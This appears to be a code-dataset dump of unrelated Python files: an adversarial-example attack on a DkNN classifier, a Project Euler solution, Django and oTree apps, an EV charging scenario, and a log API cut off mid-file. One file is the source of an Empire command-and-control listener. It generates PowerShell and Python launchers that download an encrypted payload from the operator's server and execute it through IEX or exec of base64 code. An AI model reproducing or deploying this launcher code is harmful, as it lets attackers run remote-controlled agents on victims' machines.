content: stringlengths 0 to 894k
type: stringclasses, 2 values
import logging
import numpy as np
import torch
import torch.optim as optim

INFTY = 1e20


class DKNN_PGD(object):
    """
    Implement gradient-based attack on DkNN with L-inf norm constraint.
    The loss function is the same as the L-2 attack, but it uses PGD as an
    optimizer.
    """

    def __init__(self, dknn):
        self.dknn = dknn
        self.device = dknn.device
        self.layers = dknn.layers
        self.guide_reps = {}
        self.thres = None
        self.coeff = None

    def __call__(self, x_orig, label, guide_layer, m, epsilon=0.1,
                 max_epsilon=0.3, max_iterations=1000, num_restart=1,
                 rand_start=True, thres_steps=100, check_adv_steps=100,
                 verbose=True):

        # make sure we run at least once
        if num_restart < 1:
            num_restart = 1
        # if not using randomized start, no point in doing more than one start
        if not rand_start:
            num_restart = 1

        label = label.cpu().numpy()
        batch_size = x_orig.size(0)
        min_, max_ = x_orig.min(), x_orig.max()
        # initialize adv to the original
        x_adv = x_orig.detach()
        best_num_nn = np.zeros((batch_size, ))

        # set coefficient of guide samples
        self.coeff = torch.zeros((x_orig.size(0), m))
        self.coeff[:, :m // 2] += 1
        self.coeff[:, m // 2:] -= 1

        for i in range(num_restart):
            # initialize perturbation
            delta = torch.zeros_like(x_adv)
            if rand_start:
                delta.uniform_(- max_epsilon, max_epsilon)
            delta.requires_grad_()

            for iteration in range(max_iterations):
                x = torch.clamp(x_orig + delta, min_, max_)

                # adaptively choose threshold and guide samples every
                # <thres_steps> iterations
                with torch.no_grad():
                    if iteration % thres_steps == 0:
                        thres = self.dknn.get_neighbors(x)[0][0][:, -1]
                        self.thres = torch.tensor(thres).to(self.device).view(
                            batch_size, 1)
                        self.find_guide_samples(
                            x, label, m=m, layer=guide_layer)

                reps = self.dknn.get_activations(x, requires_grad=True)
                loss = self.loss_function(reps)
                loss.backward()

                # perform update on delta
                with torch.no_grad():
                    delta -= epsilon * delta.grad.detach().sign()
                    delta.clamp_(- max_epsilon, max_epsilon)

                if (verbose and
                        iteration % (np.ceil(max_iterations / 10)) == 0):
                    print(' step: %d; loss: %.3f' %
                          (iteration, loss.cpu().detach().numpy()))

                if ((iteration + 1) % check_adv_steps == 0 or
                        iteration == max_iterations):
                    with torch.no_grad():
                        # check if x are adversarial. Only store adversarial
                        # examples if they have a larger number of wrong
                        # neighbors than previous
                        is_adv, num_nn = self.check_adv(x, label)
                        for j in range(batch_size):
                            if is_adv[j] and num_nn[j] > best_num_nn[j]:
                                x_adv[j] = x[j]
                                best_num_nn[j] = num_nn[j]

        with torch.no_grad():
            is_adv, _ = self.check_adv(x_adv, label)
        if verbose:
            print('number of successful adv: %d/%d' %
                  (is_adv.sum(), batch_size))

        return x_adv

    def check_adv(self, x, label):
        """Check if label of <x> predicted by <dknn> matches with <label>"""
        output = self.dknn.classify(x)
        num_nn = output.max(1)
        y_pred = output.argmax(1)
        is_adv = (y_pred != label).astype(np.float32)
        return is_adv, num_nn

    def loss_function(self, reps):
        """Returns the loss averaged over the batch (first dimension of x) and
        L-2 norm squared of the perturbation
        """
        batch_size = reps[self.layers[0]].size(0)
        adv_loss = torch.zeros(
            (batch_size, len(self.layers)), device=self.device)
        # find squared L-2 distance between original samples and their
        # adversarial examples at each layer
        for l, layer in enumerate(self.layers):
            rep = reps[layer].view(batch_size, 1, -1)
            dist = ((rep - self.guide_reps[layer])**2).sum(2)
            fx = self.thres - dist
            Fx = torch.max(torch.tensor(0., device=self.device),
                           self.coeff.to(self.device) * fx).sum(1)
            adv_loss[:, l] = Fx
        return adv_loss.mean()

    def find_guide_samples(self, x, label, m=100, layer='relu1'):
        """Find k nearest neighbors to <x> that all have the same class but not
        equal to <label>
        """
        num_classes = self.dknn.num_classes
        x_train = self.dknn.x_train
        y_train = self.dknn.y_train
        batch_size = x.size(0)
        nn = torch.zeros((m, ) + x.size()).transpose(0, 1)
        D, I = self.dknn.get_neighbors(
            x, k=x_train.size(0), layers=[layer])[0]

        for i, (d, ind) in enumerate(zip(D, I)):
            mean_dist = np.zeros((num_classes, ))
            for j in range(num_classes):
                mean_dist[j] = np.mean(
                    d[np.where(y_train[ind] == j)[0]][:m // 2])
            mean_dist[label[i]] += INFTY
            nearest_label = mean_dist.argmin()
            nn_ind = np.where(y_train[ind] == nearest_label)[0][:m // 2]
            nn[i, m // 2:] = x_train[ind[nn_ind]]
            nn_ind = np.where(y_train[ind] == label[i])[0][:m // 2]
            nn[i, :m // 2] = x_train[ind[nn_ind]]

        # initialize self.guide_reps if empty
        if not self.guide_reps:
            guide_rep = self.dknn.get_activations(
                nn[0], requires_grad=False)
            for l in self.layers:
                # set a zero tensor before filling it
                size = (batch_size, ) + guide_rep[l].view(m, -1).size()
                self.guide_reps[l] = torch.zeros(size, device=self.device)

        # fill self.guide_reps
        for i in range(batch_size):
            guide_rep = self.dknn.get_activations(
                nn[i], requires_grad=False)
            self.guide_reps[layer][i] = guide_rep[layer].view(
                m, -1).detach()
python
from projecteuler import util
from functools import reduce
from operator import mul


def solution():
    """
    The four adjacent digits in the 1000-digit number that have the greatest
    product are 9 × 9 × 8 × 9 = 5832.

    Find the thirteen adjacent digits in the 1000-digit number that have the
    greatest product. What is the value of this product?
    """
    ans = 0
    with open('../data/problem_008_data.txt') as f:
        n = [int(x) for x in f.read().replace('\n', '')]
    for i in range(len(n)):
        tmp = reduce(mul, n[i:i + 13])
        if tmp > ans:
            ans = tmp
    return ans


if __name__ == '__main__':
    assert str(solution()) == util.get_answer(8)
python
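A self-contained sketch of the same sliding-window idea as the solution above, with the window length parameterised and the range bounded so that no window shorter than requested is scored (the original loop's trailing slices are shorter than 13 digits). The digit string below is made up so that the 9 × 9 × 8 × 9 = 5832 example from the docstring can be reproduced without the data file.

from functools import reduce
from operator import mul


def greatest_adjacent_product(digits, window=13):
    # consider only full-length windows
    return max(
        reduce(mul, digits[i:i + window])
        for i in range(len(digits) - window + 1)
    )


sample = [int(c) for c in "3167998912"]              # made-up digits containing 9, 9, 8, 9
print(greatest_adjacent_product(sample, window=4))   # 5832, matching the docstring example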
# Reads a value and prints its primitive type. The prompts are Portuguese:
# 'Digite algo' = 'Type something'; 'O tipo primitivo de algo é' = 'The primitive type of algo is'.
algo = input('Digite algo: ')
print('O tipo primitivo de algo é', type(algo))
python
from __future__ import print_function import base64 import random from builtins import object, str from textwrap import dedent from typing import List from empire.server.common import helpers, packets from empire.server.utils import data_util, listener_util class Listener(object): def __init__(self, mainMenu, params=[]): self.info = { "Name": "HTTP[S]", "Author": ["@harmj0y"], "Description": ("Starts a 'foreign' http[s] Empire listener."), "Category": ("client_server"), "Comments": [], } # any options needed by the stager, settable during runtime self.options = { # format: # value_name : {description, required, default_value} "Name": { "Description": "Name for the listener.", "Required": True, "Value": "http_foreign", }, "Host": { "Description": "Hostname/IP for staging.", "Required": True, "Value": "http://%s" % (helpers.lhost()), }, "Port": { "Description": "Port for the listener.", "Required": True, "Value": "", }, "Launcher": { "Description": "Launcher string.", "Required": True, "Value": "powershell -noP -sta -w 1 -enc ", }, "StagingKey": { "Description": "Staging key for initial agent negotiation.", "Required": True, "Value": "2c103f2c4ed1e59c0b4e2e01821770fa", }, "DefaultDelay": { "Description": "Agent delay/reach back interval (in seconds).", "Required": True, "Value": 5, }, "DefaultJitter": { "Description": "Jitter in agent reachback interval (0.0-1.0).", "Required": True, "Value": 0.0, }, "DefaultLostLimit": { "Description": "Number of missed checkins before exiting", "Required": True, "Value": 60, }, "DefaultProfile": { "Description": "Default communication profile for the agent.", "Required": True, "Value": "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", }, "KillDate": { "Description": "Date for the listener to exit (MM/dd/yyyy).", "Required": False, "Value": "", }, "WorkingHours": { "Description": "Hours for the agent to operate (09:00-17:00).", "Required": False, "Value": "", }, "SlackURL": { "Description": "Your Slack Incoming Webhook URL to communicate with your Slack instance.", "Required": False, "Value": "", }, } # required: self.mainMenu = mainMenu self.threads = {} # optional/specific for this module self.app = None self.uris = [ a.strip("/") for a in self.options["DefaultProfile"]["Value"].split("|")[0].split(",") ] # set the default staging key to the controller db default self.options["StagingKey"]["Value"] = str( data_util.get_config("staging_key")[0] ) def default_response(self): """ If there's a default response expected from the server that the client needs to ignore, (i.e. a default HTTP page), put the generation here. """ return "" def validate_options(self): """ Validate all options for this listener. """ self.uris = [ a.strip("/") for a in self.options["DefaultProfile"]["Value"].split("|")[0].split(",") ] for key in self.options: if self.options[key]["Required"] and ( str(self.options[key]["Value"]).strip() == "" ): print(helpers.color('[!] Option "%s" is required.' % (key))) return False return True def generate_launcher( self, encode=True, obfuscate=False, obfuscationCommand="", userAgent="default", proxy="default", proxyCreds="default", stagerRetries="0", language=None, safeChecks="", listenerName=None, bypasses: List[str] = None, ): """ Generate a basic launcher for the specified listener. """ bypasses = [] if bypasses is None else bypasses if not language: print( helpers.color( "[!] listeners/http_foreign generate_launcher(): no language specified!" 
) ) if listenerName and (listenerName in self.mainMenu.listeners.activeListeners): # extract the set options for this instantiated listener listenerOptions = self.mainMenu.listeners.activeListeners[listenerName][ "options" ] host = listenerOptions["Host"]["Value"] launcher = listenerOptions["Launcher"]["Value"] stagingKey = listenerOptions["StagingKey"]["Value"] profile = listenerOptions["DefaultProfile"]["Value"] uris = [a for a in profile.split("|")[0].split(",")] stage0 = random.choice(uris) customHeaders = profile.split("|")[2:] if language.startswith("po"): # PowerShell stager = '$ErrorActionPreference = "SilentlyContinue";' if safeChecks.lower() == "true": stager = "If($PSVersionTable.PSVersion.Major -ge 3){" for bypass in bypasses: stager += bypass stager += "};[System.Net.ServicePointManager]::Expect100Continue=0;" stager += "$wc=New-Object System.Net.WebClient;" if userAgent.lower() == "default": profile = listenerOptions["DefaultProfile"]["Value"] userAgent = profile.split("|")[1] stager += f"$u='{ userAgent }';" if "https" in host: # allow for self-signed certificates for https connections stager += "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};" if userAgent.lower() != "none" or proxy.lower() != "none": if userAgent.lower() != "none": stager += "$wc.Headers.Add('User-Agent',$u);" if proxy.lower() != "none": if proxy.lower() == "default": stager += ( "$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;" ) else: # TODO: implement form for other proxy stager += "$proxy=New-Object Net.WebProxy;" stager += f"$proxy.Address = '{ proxy.lower() }';" stager += "$wc.Proxy = $proxy;" if proxyCreds.lower() == "default": stager += "$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;" else: # TODO: implement form for other proxy credentials username = proxyCreds.split(":")[0] password = proxyCreds.split(":")[1] domain = username.split("\\")[0] usr = username.split("\\")[1] stager += f"$netcred = New-Object System.Net.NetworkCredential('{ usr }', '{ password }', '{ domain }');" stager += f"$wc.Proxy.Credentials = $netcred;" # TODO: reimplement stager retries? 
# Add custom headers if any if customHeaders != []: for header in customHeaders: headerKey = header.split(":")[0] headerValue = header.split(":")[1] stager += f'$wc.Headers.Add("{ headerKey }","{ headerValue }");' # code to turn the key string into a byte array stager += ( f"$K=[System.Text.Encoding]::ASCII.GetBytes('{ stagingKey }');" ) # this is the minimized RC4 stager code from rc4.ps1 stager += listener_util.powershell_rc4() # prebuild the request routing packet for the launcher routingPacket = packets.build_routing_packet( stagingKey, sessionID="00000000", language="POWERSHELL", meta="STAGE0", additional="None", encData="", ) b64RoutingPacket = base64.b64encode(routingPacket) # add the RC4 packet to a cookie stager += f'$wc.Headers.Add("Cookie","session={ b64RoutingPacket.decode("UTF-8") }");' stager += f"$ser= { helpers.obfuscate_call_home_address(host) };$t='{ stage0 }';" stager += "$data=$wc.DownloadData($ser+$t);" stager += "$iv=$data[0..3];$data=$data[4..$data.length];" # decode everything and kick it over to IEX to kick off execution stager += "-join[Char[]](& $R $data ($IV+$K))|IEX" # Remove comments and make one line stager = helpers.strip_powershell_comments(stager) stager = data_util.ps_convert_to_oneliner(stager) if obfuscate: stager = data_util.obfuscate( self.mainMenu.installPath, stager, obfuscationCommand=obfuscationCommand, ) # base64 encode the stager and return it if encode and ( (not obfuscate) or ("launcher" not in obfuscationCommand.lower()) ): return helpers.powershell_launcher(stager, launcher) else: # otherwise return the case-randomized stager return stager if language.startswith("py"): # Python launcherBase = "import sys;" if "https" in host: # monkey patch ssl woohooo launcherBase += "import ssl;\nif hasattr(ssl, '_create_unverified_context'):ssl._create_default_https_context = ssl._create_unverified_context;\n" try: if safeChecks.lower() == "true": launcherBase += listener_util.python_safe_checks() except Exception as e: p = "[!] 
Error setting LittleSnitch in stagger: " + str(e) print(helpers.color(p, color="red")) if userAgent.lower() == "default": profile = listenerOptions["DefaultProfile"]["Value"] userAgent = profile.split("|")[1] launcherBase += dedent( f""" o=__import__({{2:'urllib2',3:'urllib.request'}}[sys.version_info[0]],fromlist=['build_opener']).build_opener(); UA='{userAgent}'; server='{host}';t='{stage0}'; """ ) # prebuild the request routing packet for the launcher routingPacket = packets.build_routing_packet( stagingKey, sessionID="00000000", language="POWERSHELL", meta="STAGE0", additional="None", encData="", ) b64RoutingPacket = base64.b64encode(routingPacket).decode("UTF-8") # add the RC4 packet to a cookie launcherBase += ( 'o.addheaders=[(\'User-Agent\',UA), ("Cookie", "session=%s")];\n' % (b64RoutingPacket) ) launcherBase += "import urllib.request;\n" if proxy.lower() != "none": if proxy.lower() == "default": launcherBase += "proxy = urllib.request.ProxyHandler();\n" else: proto = proxy.Split(":")[0] launcherBase += ( "proxy = urllib.request.ProxyHandler({'" + proto + "':'" + proxy + "'});\n" ) if proxyCreds != "none": if proxyCreds == "default": launcherBase += "o = urllib.request.build_opener(proxy);\n" else: launcherBase += "proxy_auth_handler = urllib.request.ProxyBasicAuthHandler();\n" username = proxyCreds.split(":")[0] password = proxyCreds.split(":")[1] launcherBase += ( "proxy_auth_handler.add_password(None,'" + proxy + "','" + username + "','" + password + "');\n" ) launcherBase += "o = urllib.request.build_opener(proxy, proxy_auth_handler);\n" else: launcherBase += "o = urllib.request.build_opener(proxy);\n" else: launcherBase += "o = urllib.request.build_opener();\n" # install proxy and creds globally, so they can be used with urlopen. launcherBase += "urllib.request.install_opener(o);\n" launcherBase += "a=o.open(server+t).read();\n" # download the stager and extract the IV launcherBase += listener_util.python_extract_stager(stagingKey) if encode: launchEncoded = base64.b64encode( launcherBase.encode("UTF-8") ).decode("UTF-8") if isinstance(launchEncoded, bytes): launchEncoded = launchEncoded.decode("UTF-8") launcher = ( "echo \"import sys,base64;exec(base64.b64decode('%s'));\" | python3 &" % (launchEncoded) ) return launcher else: return launcherBase else: print( helpers.color( "[!] listeners/http_foreign generate_launcher(): invalid language specification: only 'powershell' and 'python' are current supported for this module." ) ) else: print( helpers.color( "[!] listeners/http_foreign generate_launcher(): invalid listener name specification!" ) ) def generate_stager( self, listenerOptions, encode=False, encrypt=True, obfuscate=False, obfuscationCommand="", language=None, ): """ If you want to support staging for the listener module, generate_stager must be implemented to return the stage1 key-negotiation stager code. """ print( helpers.color( "[!] generate_stager() not implemented for listeners/template" ) ) return "" def generate_agent( self, listenerOptions, language=None, obfuscate=False, obfuscationCommand="" ): """ If you want to support staging for the listener module, generate_agent must be implemented to return the actual staged agent code. """ print( helpers.color("[!] generate_agent() not implemented for listeners/template") ) return "" def generate_comms(self, listenerOptions, language=None): """ Generate just the agent communication code block needed for communications with this listener. This is so agents can easily be dynamically updated for the new listener. 
""" if language: if language.lower() == "powershell": updateServers = """ $Script:ControlServers = @("%s"); $Script:ServerIndex = 0; """ % ( listenerOptions["Host"]["Value"] ) getTask = """ $script:GetTask = { try { if ($Script:ControlServers[$Script:ServerIndex].StartsWith("http")) { # meta 'TASKING_REQUEST' : 4 $RoutingPacket = New-RoutingPacket -EncData $Null -Meta 4 $RoutingCookie = [Convert]::ToBase64String($RoutingPacket) # build the web request object $wc= New-Object System.Net.WebClient # set the proxy settings for the WC to be the default system settings $wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy(); $wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials; $wc.Headers.Add("User-Agent",$script:UserAgent) $script:Headers.GetEnumerator() | % {$wc.Headers.Add($_.Name, $_.Value)} $wc.Headers.Add("Cookie", "session=$RoutingCookie") # choose a random valid URI for checkin $taskURI = $script:TaskURIs | Get-Random $result = $wc.DownloadData($Script:ControlServers[$Script:ServerIndex] + $taskURI) $result } } catch [Net.WebException] { $script:MissedCheckins += 1 if ($_.Exception.GetBaseException().Response.statuscode -eq 401) { # restart key negotiation Start-Negotiate -S "$ser" -SK $SK -UA $ua } } } """ sendMessage = listener_util.powershell_send_message() return updateServers + getTask + sendMessage elif language.lower() == "python": updateServers = "server = '%s'\n" % (listenerOptions["Host"]["Value"]) # Import sockschain code f = open( self.mainMenu.installPath + "/data/agent/stagers/common/sockschain.py" ) socks_import = f.read() f.close() sendMessage = listener_util.python_send_message(self.session_cookie) return socks_import + updateServers + sendMessage else: print( helpers.color( "[!] listeners/http_foreign generate_comms(): invalid language specification, only 'powershell' and 'python' are current supported for this module." ) ) else: print( helpers.color( "[!] listeners/http_foreign generate_comms(): no language specified!" ) ) def start(self, name=""): """ Nothing to actually start for a foreign listner. """ return True def shutdown(self, name=""): """ Nothing to actually shut down for a foreign listner. """ pass
python
from blackpearl.modules import Module
from blackpearl.modules import Timer
from blackpearl.projects import Project


class MyTimer(Timer):
    tick = 0.1

    def setup(self):
        self.start()


class Listener(Module):
    listening_for = ['timer']

    def receive(self, message):
        print(message['timer']['time'])


class MyProject(Project):
    modules_required = [MyTimer, Listener,]


if __name__ == '__main__':
    MyProject()
python
from otree.api import *

c = Currency

doc = """
Your app description
"""


class Constants(BaseConstants):
    name_in_url = 'payment_info'
    players_per_group = None
    num_rounds = 1


class Subsession(BaseSubsession):
    pass


class Group(BaseGroup):
    pass


class Player(BasePlayer):
    pass


# PAGES
class PaymentInfo(Page):
    pass


page_sequence = [PaymentInfo]
python
from src.grid.electrical_vehicle import EV from collections import defaultdict from typing import List import numpy as np class Scenario: def __init__(self, load_inds: list, timesteps_hr: np.ndarray, evs: List[EV], power_price: np.ndarray, ): """ Scenario aggregates information about EVs and power price . load_inds -- indicis of the load nodes in the grid timesteps_hr -- array of the timesteps evs -- list of the EVs power_price -- array specifying power price. Should have the same shape as timesteps_hr """ self.load_inds = load_inds self.n_loads = len(load_inds) self.power_price = power_price self._setup_times(timesteps_hr) self._setup_evs(evs) assert power_price.shape == self.timesteps_hr.shape, 'Timesteps and power price shapes must be equal' def _setup_times(self, timesteps_hr): self.timesteps_hr = timesteps_hr self.t_start_hr = timesteps_hr[0] self.t_start_ind = 0 self.t_end_hr = timesteps_hr[-1] self.n_timesteps = len(self.timesteps_hr) self.t_end_ind = self.n_timesteps - 1 self.ptu_size_hr = timesteps_hr[1] - timesteps_hr[0] self.ptu_size_minutes = int(60 * self.ptu_size_hr) def _setup_evs(self, evs): self.evs = evs self.load_evs_presence = {load_ind: defaultdict(list) for load_ind in self.load_inds} self.ev_status = defaultdict(dict) self.t_ind_arrivals = defaultdict(list) self.t_ind_departures = defaultdict(list) self.t_ind_charging_evs = defaultdict(list) self.load_ind_business = {load_ind: np.zeros(self.n_timesteps) for load_ind in self.load_inds} for ev in evs: # ev.utility_coef /= self.norm_factor t_arr_ind = int(ev.t_arr_hr / self.ptu_size_hr) t_dep_ind = int(ev.t_dep_hr / self.ptu_size_hr) assert t_arr_ind == ev.t_arr_hr / self.ptu_size_hr and t_dep_ind == ev.t_dep_hr / self.ptu_size_hr, \ 'EVs arrival and departure times should be rounded to PTU size !' self.load_ind_business[ev.load_ind][t_arr_ind: t_dep_ind] = True for t_ind in range(self.timesteps_hr.shape[0]): if t_ind < t_arr_ind: self.ev_status[ev][t_ind] = 'inactive' elif t_ind == t_arr_ind: self.ev_status[ev][t_ind] = 'arrive' self.t_ind_arrivals[t_ind].append(ev) self.load_evs_presence[ev.load_ind][t_ind].append(ev) elif t_arr_ind < t_ind < t_dep_ind: self.ev_status[ev][t_ind] = 'active' self.t_ind_charging_evs[t_ind].append(ev) self.load_evs_presence[ev.load_ind][t_ind].append(ev) elif t_ind == t_dep_ind: self.ev_status[ev][t_ind] = 'depart' self.t_ind_departures[t_ind].append(ev) self.load_evs_presence[ev.load_ind][t_ind].append(ev) elif t_ind > t_dep_ind: self.ev_status[ev][t_ind] = 'inactive' def get_evs_known_at_t_ind(self, t_ind: int) -> List[EV]: evs_known_at_t_ind = [ev for ev in self.evs if int(ev.t_arr_hr / self.ptu_size_hr) <= t_ind] return evs_known_at_t_ind def create_scenario_unknown_future(self, t_ind): evs_known_at_t_ind = self.get_evs_known_at_t_ind(t_ind) return Scenario(self.load_inds, self.timesteps_hr, evs_known_at_t_ind, self.power_price)
python
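A small, runnable illustration of the PTU-index arithmetic that Scenario relies on; the timestep grid and the arrival time below are made up for the example.

import numpy as np

timesteps_hr = np.arange(0.0, 24.0, 0.25)      # 15-minute PTUs over one day (made-up grid)
ptu_size_hr = timesteps_hr[1] - timesteps_hr[0]
t_arr_hr = 8.5                                 # an EV arriving at 08:30
t_arr_ind = int(t_arr_hr / ptu_size_hr)
assert t_arr_ind == t_arr_hr / ptu_size_hr     # the same rounding check Scenario asserts
print(ptu_size_hr, int(60 * ptu_size_hr), t_arr_ind)   # 0.25 15 34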
from django.shortcuts import render, redirect from django.http import HttpResponse import django.contrib.auth as auth from django.contrib.auth.decorators import login_required from django.contrib.auth.models import User from apps import EftConfig from . import models as etf_models import json from parser import parse_by_symbol def index(request): return render(request, 'index.html', {}) def signup_view(request): return render(request, 'signup.html', {}) def login(request): if 'POST' != request.method: return render(request, 'message.html', {'message': 'login failed1'}, status=400) if 'username' not in request.POST or 'password' not in request.POST: return render(request, 'message.html', {'message': 'login failed2'}, status=400) username = request.POST['username'] password = request.POST['password'] # TODO more careful username and password validation if username == '' or password == '': return render(request, 'message.html', {'message': 'login failed3'}, status=400) # validation user = auth.authenticate(username=username, password=password) if None == user: return render(request, 'message.html', {'message': 'login failed4'}, status=400) # login auth.login(request, user) # then redirect return redirect('search') def signup(request): if 'POST' != request.method: return render(request, 'message.html', {'message': 'signup failed1'}, status=400) post_data = request.POST if 'username' not in post_data or 'password' not in post_data or \ 'email' not in post_data or 'first_name' not in post_data or \ 'last_name' not in post_data: return render(request, 'message.html', {'message': 'signup failed2'}, status=400) username = post_data['username'] password = post_data['password'] email = post_data['email'] first_name = post_data['first_name'] last_name = post_data['last_name'] # TODO validate the input try: user = User.objects.create_user(username=username, password=password, email=email, first_name=first_name, last_name=last_name) user.save() except Exception as e: return render(request, 'message.html', {'message': str(e)}, status=400) return render(request, 'message.html', {'message': 'register successfully'}, status=200) def logout(request): auth.logout(request) return redirect('index') @login_required def search(request): return render(request, 'search.html') @login_required def history(request): return render(request, 'history.html') ### ajax apis ####### @login_required def _history(request): if not request.is_ajax(): return HttpResponse(json.dumps({'error': 'bad header'}), status=404, content_type='application/json') user = request.user response_data = { 'records': [], } for record in etf_models.EtfRecord.objects.filter(user_id=user.id): r = {} r['symbol'] = record.symbol r['etf_name'] = record.etf_name r['fund_description'] = record.fund_description response_data['records'].append(r) return HttpResponse(json.dumps(response_data), status=200, content_type='application/json') @login_required def _search(request): ''' data format example: {'symbol': 'DTS'} ''' user = request.user if 'GET' != request.method or not request.is_ajax(): return HttpResponse(json.dumps({'error': 'bad header'}), status=404, content_type='application/json') record = None try : # TODO validate the data, symbol = request.GET['symbol'] # getting from db if possible data = etf_models.EtfRecord.objects.filter(symbol=symbol) if (len(data) > 0): # no need to query again, it is in the db. 
record = data[0] except Exception as error: error_msg = { 'error': str(error), 'user_msg': 'Server encountered an error' } return HttpResponse(json.dumps(error_msg), content_type='application/json', status=400) try: if (None == record): # need to parse from the website etf_data = parse_by_symbol(symbol) # save it to db record = etf_models.EtfRecord.objects.create(user=user, symbol=etf_data['symbol'], etf_name=etf_data['etf_name'], fund_description=etf_data['fund_description']) record.save() for holding in etf_data['top_10_holdings']: h = etf_models.Holding.objects.create(record=record, name=holding['name'], weight=holding['weight'], shares=holding['shares']) h.save() for country_weight in etf_data['country_weights']: cw = etf_models.CountryWeights.objects.create(record=record, country=country_weight['country'], weight=country_weight['weight']) cw.save() for sector_weight in etf_data['sector_weights']: sw = etf_models.SectorWeights.objects.create(record=record, sector=sector_weight['sector'], weight=sector_weight['weight']) sw.save() except Exception as error: # undo possible changes to db data = etf_models.EtfRecord.objects.filter(symbol=symbol) if (len(data) > 0): record = data[0] record.delete() error_msg = { 'error': str(error), 'user_msg': 'invalid symbol' } # raise error # for debug return HttpResponse(json.dumps(error_msg), content_type='application/json', status=400) # construct response response_data = {} response_data['fund_description'] = record.fund_description response_data['etf_name'] = record.fund_description response_data['symbol'] = symbol top_10_holdings = [] for h in record.holding_set.all(): top_10_holdings.append({ 'name': h.name, 'weight': h.weight, 'shares': h.shares }) country_weights = [] for w in record.countryweights_set.all(): country_weights.append({ 'country': w.country, 'weight': w.weight }) sector_weights = [] for w in record.sectorweights_set.all(): sector_weights.append({ 'sector': w.sector, 'weight': w.weight }) response_data['top_10_holdings'] = top_10_holdings response_data['country_weights'] = country_weights response_data['sector_weights'] = sector_weights return HttpResponse(json.dumps(response_data), status=200, content_type='application/json') @login_required def download(request, table, symbol): user = request.user records = etf_models.EtfRecord.objects.filter(symbol=symbol) if len(records) < 1: return HttpResponse(status=404) record = records[0] if 'top10holdings' == table: csv_data = 'name,weight,shares\n' for holding in record.holding_set.all(): csv_data += '{0},{1},{2}\n'.format(holding.name, holding.weight, holding.shares) response = HttpResponse(csv_data) response['Content-Disposition'] = 'attachment;filename="holdings.csv"' return response elif 'countryweights' == table: csv_data = 'country,weight\n' for cw in record.countryweights_set.all(): csv_data += '{0},{1}\n'.format(cw.country, str(cw.weight)+'%') response = HttpResponse(csv_data) response['Content-Disposition'] = 'attachment;filename="country weight.csv"' return response elif 'sectorweights' == table: csv_data = 'sector,weight\n' for sw in record.sectorweights_set.all(): csv_data += '{0},{1}\n'.format(sw.sector, str(sw.weight)+'%') response = HttpResponse(csv_data) response['Content-Disposition'] = 'attachment;filename="sector weight.csv"' return response else: return HttpResponse(status=404)
python
from django.http import HttpResponse, StreamingHttpResponse from django.views.decorators.csrf import csrf_exempt from gzip import GzipFile import tarfile from io import BytesIO from datetime import datetime import json import traceback from psycopg2 import OperationalError from interface.settings import PREVIEW_LIMIT, POSTGRES_CONFIG, FIELD_DESCRIPTIONS, HEARTBEAT, BASE_DIR, LOGS_TIME_BUFFER from .postgresql_manager import PostgreSQL_Manager import threading import time from .input_validator import load_and_validate_columns, load_and_validate_constraints, load_and_validate_date, load_and_validate_order_clauses from logger_manager import LoggerManager PGM = PostgreSQL_Manager(POSTGRES_CONFIG, FIELD_DESCRIPTIONS.keys(), LOGS_TIME_BUFFER) LOGGER = LoggerManager(logger_name='opendata-interface', module_name='opendata', heartbeat_dir=HEARTBEAT['dir']) def heartbeat(): while True: try: PGM.get_min_and_max_dates() LOGGER.log_heartbeat('Scheduled heartbeat', HEARTBEAT['api_file'], 'SUCCEEDED') except OperationalError as operational_error: LOGGER.log_heartbeat('PostgreSQL error: {0}'.format(str(operational_error).replace('\n', ' ')), HEARTBEAT['api_file'], 'FAILED') except Exception as exception: LOGGER.log_heartbeat('Error: {0}'.format(str(exception).replace('\n', ' ')), HEARTBEAT['api_file'], 'FAILED') time.sleep(HEARTBEAT['interval']) heartbeat_thread = threading.Thread(target=heartbeat) heartbeat_thread.daemon = True heartbeat_thread.start() @csrf_exempt def get_daily_logs(request): try: if request.method == 'GET': request_data = request.GET else: request_data = json.loads(request.body.decode('utf8')) date = load_and_validate_date(request_data.get('date', '')) columns = load_and_validate_columns(request_data.get('columns', '[]')) constraints = load_and_validate_constraints(request_data.get('constraints', '[]')) order_clauses = load_and_validate_order_clauses(request_data.get('order-clauses', '[]')) except Exception as exception: LOGGER.log_error('api_daily_logs_query_validation_failed', 'Failed to validate daily logs query. {0} ERROR: {1}'.format( str(exception), traceback.format_exc().replace('\n', '') )) return HttpResponse(json.dumps({'error': str(exception)}), status=400) try: gzipped_file = _generate_gzipped_file(date, columns, constraints, order_clauses) response = HttpResponse(gzipped_file, content_type='application/gzip') response['Content-Disposition'] = 'attachment; filename="{0:04d}-{1:02d}-{2:02d}@{3}.tar.gz"'.format( date.year, date.month, date.day, int(datetime.now().timestamp()) ) return response except Exception as exception: LOGGER.log_error('api_daily_logs_query_failed', 'Failed retrieving daily logs. ERROR: {0}'.format( traceback.format_exc().replace('\n', '') )) return HttpResponse( json.dumps({'error': 'Server encountered error when generating gzipped tarball.'}), status=500 ) @csrf_exempt def get_preview_data(request): try: if request.method == 'GET': request_data = request.GET else: request_data = json.loads(request.body.decode('utf8')) date = load_and_validate_date(request_data.get('date', '')) columns = load_and_validate_columns(request_data.get('columns', '[]')) constraints = load_and_validate_constraints(request_data.get('constraints', '[]')) order_clauses = load_and_validate_order_clauses(request_data.get('order-clauses', '[]')) except Exception as exception: LOGGER.log_error('api_preview_data_query_validation_failed', 'Failed to validate daily preview data query. 
